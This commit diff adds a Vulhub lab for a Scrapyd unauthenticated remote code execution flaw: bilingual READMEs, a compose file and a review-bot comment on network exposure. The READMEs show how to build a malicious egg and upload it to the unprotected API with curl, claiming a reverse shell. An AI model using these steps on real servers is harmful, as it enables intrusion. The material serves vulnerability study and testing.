first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
BIN
scrapy/scrapyd-unacc/1.png
Normal file
Binary file not shown.
After: Size 43 KiB
39
scrapy/scrapyd-unacc/README.md
Normal file
@@ -0,0 +1,39 @@
# Scrapyd Pre-Auth Remote Code Execution

[中文版本(Chinese version)](README.zh-cn.md)

Scrapyd is an application for deploying and running Scrapy spiders. It enables users to deploy (upload) projects and control their spiders using a JSON API.

References: <https://www.leavesongs.com/PENETRATION/attack-scrapy.html>

## Start server

Execution the following command to start a scrapyd server:

```bash
docker compose up -d
```

After scrapyd is deployed, the server is listening on `http://your-ip:6800`.

## Reproduce

Build a evil egg archive:

```bash
pip install scrapy scrapyd-client
scrapy startproject evil
cd evil
# edit evil/__init__.py, add evil code
scrapyd-deploy --build-egg=evil.egg
```

Upload evil egg to the scrapyd server:

```bash
curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg
```

reverse shell is available:


37
scrapy/scrapyd-unacc/README.zh-cn.md
Normal file
@@ -0,0 +1,37 @@
# scrapyd 未授权访问漏洞

scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。

参考链接:<https://www.leavesongs.com/PENETRATION/attack-scrapy.html>

## 环境搭建

执行如下命令启动scrapyd服务:

```
docker compose up -d
```

环境启动后,访问`http://your-ip:6800`即可看到Web界面。

## 漏洞复现

参考[攻击Scrapyd爬虫](https://www.leavesongs.com/PENETRATION/attack-scrapy.html),构造一个恶意的scrapy包:

```bash
pip install scrapy scrapyd-client
scrapy startproject evil
cd evil
# 编辑 evil/__init__.py, 加入恶意代码
scrapyd-deploy --build-egg=evil.egg
```

向API接口发送恶意包:

```bash
curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg
```

成功反弹shell:


6
scrapy/scrapyd-unacc/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
version: '2'
services:
scrapyd:
image: vulhub/scrapyd:1.2.1
ports:
- "6800:6800"
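Review bot: `version: '2'` is the legacy Compose file version key; both READMEs start the lab with `docker compose up -d` (the v2 plugin), which ignores this key and, in newer releases, warns that the attribute is obsolete, so the line can be dropped. The `"6800:6800"` mapping publishes the unauthenticated API on every host interface, which is what the READMEs' `http://your-ip:6800` instructions rely on; the README should say so explicitly so that people running the lab keep it on an isolated network.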